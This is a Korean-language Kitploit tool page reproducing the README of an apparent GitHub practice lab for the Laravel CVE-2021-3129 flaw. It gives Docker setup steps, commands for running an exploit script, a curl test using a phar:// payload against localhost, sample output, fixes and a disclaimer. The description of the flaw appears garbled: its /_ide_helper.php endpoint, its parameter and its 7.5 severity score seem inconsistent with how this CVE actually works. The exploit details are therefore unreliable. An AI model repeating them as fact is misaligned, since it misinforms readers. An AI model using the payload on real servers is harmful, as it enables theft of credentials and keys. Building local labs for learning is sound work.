Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel Debug Mode RCE - 완벽한 익스플로잇 실습 랩 (Python 익스플로잇, Docker 컨테이너, 보안 분석 가이드 포함). | Kitploit
도구/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE - 완벽한 익스플로잇 실습 랩 (Python 익스플로잇, Docker 컨테이너, 보안 분석 가이드 포함).

저장소 보기
181개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-3129: Laravel 디버그 모드 RCE 실습

License: MIT Python 3.8+ Docker CVSS: 7.5

CVE-2021-3129를 악용하는 실습입니다. 이는 Laravel의 심각한 취약점으로, 인증 없이 파일 읽기 및 잠재적 원격 코드 실행(RCE)이 가능합니다.

Quick Start

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

CVE-2021-3129란?

속성세부 내용
심각도CVSS 7.5 (높음)
영향받는 버전Laravel 8.4.2 미만, 7.30.4 미만
영향임의 파일 읽기, 정보 노출, 잠재적 RCE
인증 필요아니오
공격 벡터네트워크

작동 방식

  1. 정찰 - 디버그 모드가 활성화된 Laravel 식별
  2. 검증 - /_ide_helper.php 엔드포인트 테스트
  3. 악용 - 파일 읽기에 phar:// 래퍼 사용
  4. 영향 - 자격 증명, API 키, 환경 변수 추출

사전 요구 사항

  • Docker Desktop
  • Python 3.8+
  • 4GB RAM

설정 (단계별)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

예상 출력

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

익스플로잇 사용법

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

수동 테스트

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

해결 방법

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

정리

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

자주 묻는 질문 (FAQ)

Q: 인터넷에서 테스트할 수 있나요?
A: 아니요. 로컬호스트 전용입니다. 소유하지 않은 시스템에서 절대 테스트하지 마세요.

Q: 패치된 버전에서도 작동하나요?
A: 아니요. Laravel 8.4.2 이상 및 7.30.4 이상은 패치되었습니다.

Q: 익스플로잇을 수정할 수 있나요?
A: 네. 코드는 학습을 위해 완전히 주석 처리되어 있습니다.

Q: 네트워크 트래픽을 캡처하는 방법은?
A: tcpdump 또는 Wireshark를 사용하세요:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

법적 고지

⚠️ 교육 목적으로만 사용하세요

✅ 승인된 사용:

  • 교육 학습
  • 승인된 보안 테스트
  • 방어 연구

❌ 금지된 사용:

  • 승인되지 않은 시스템 접근
  • 불법 해킹
  • 시스템 손상

소유하거나 테스트할 명시적 허가를 받은 시스템에서만 사용하세요.

참고 자료

  • CVE-2021-3129
  • Laravel Security
  • PHP Wrappers

작성자

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Location: Bengaluru, Karnataka, India

라이선스

MIT License - LICENSE 파일 참조

도구 다운로드